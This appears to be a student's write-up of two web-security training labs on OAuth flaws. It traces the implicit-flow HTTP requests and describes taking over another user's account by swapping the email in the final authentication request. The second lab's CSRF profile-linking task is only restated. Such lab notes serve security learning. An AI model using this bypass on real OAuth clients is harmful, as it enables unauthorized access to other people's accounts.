labs
Lab - 1: Authentication bypass via OAuth implicit flow (A)
This lab uses an OAuth service to allow users to log in with their social media account. Flawed validation by the client application makes it possible for an attacker to log in to other users' accounts without knowing their password. To solve the lab, log in to Carlos's account. His email address is carlos@carlos-montoya.net. You can log in with your own social media account using the following credentials: wiener:peter.
Flow of OAuth process for this lab
GET /my-account
from application redirected to/social-login
GET /social-login
-> response contains meta tag to fetch from OAuth service
<meta
http-equiv="refresh"
content="3;url=https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/auth?client_id=quzs4k6iz0iqzfchxka1k&redirect_uri=https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback&response_type=token&nonce=-1853408548&scope=openid%20profile%20email"
/>
then the following GET request takes place to get from OAuth server
GET /auth?client_id=quzs4k6iz0iqzfchxka1k&redirect_uri=https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback&response_type=token&nonce=-1853408548&scope=openid%20profile%20email HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
It has
It redirects to
GET /interaction/SSmbqLjw_N9qhTQEjMUyQ HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
from OAuth server and contain button to Continue
<form
autocomplete="off"
action="/interaction/cXAbo8_Osu7Vjt44iUQyP/confirm"
method="post"
>
<button autofocus type="submit" class="login login-submit">Continue</button>
</form>
If submitted, it will make a POST request to OAuth service
POST /interaction/cXAbo8_Osu7Vjt44iUQyP/confirm HTTP/1.1
Host: oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net
which redirects to https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/auth/cXAbo8_Osu7Vjt44iUQyP
again it redirects to application callback
https://0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net/oauth-callback#access_token=cak10bhH032h6tHMqRXXF-J7PuuHMNB0Mf_cBDrA4G1&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email
at
GET /oauth-callback HTTP/1.1
Host: 0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net
from application, response is to parse the URL to extract the data like this
Inside above code, fetching
https://oauth-0aa20037048bd37cc089049e029c00d2.web-security-academy.net/me
will get required data like this
{
"sub": "wiener",
"name": "Peter Wiener",
"email": "wiener@hotdog.com",
"email_verified": true
}
finally, it will make
POST /authenticate
to application and user is logged in
POST /authenticate HTTP/1.1
Host: 0ab700250451d3a5c0ee0410001a00c9.web-security-academy.net
...
{"email":"wiener@hotdog.com","username":"wiener","token":"cak10bhH032h6tHMqRXXF-J7PuuHMNB0Mf_cBDrA4G1"}
to solve the lab, change the email to
carlos's email
if the request is via interception on mode OR in POST request box, Right-Click > Request in browser > in original session > copy the URL and paste it in the browser
Lab - 2: Forced OAuth profile linking (P)
This lab gives you the option to attach a social media profile to your account so that you can log in via OAuth instead of using the normal username and password. Due to the insecure implementation of the OAuth flow by the client application, an attacker can manipulate this functionality to obtain access to other users' accounts. To solve the lab, use a CSRF attack to attach your own social media profile to the admin user's account on the blog website, then access the admin panel and delete Carlos. The admin user will open anything you send from the exploit server and they always have an active session on the blog website. You can log in to your own accounts using the following credentials:
Blog website account: wiener:peter
Social media profile: peter.wiener:hotdog
Last updated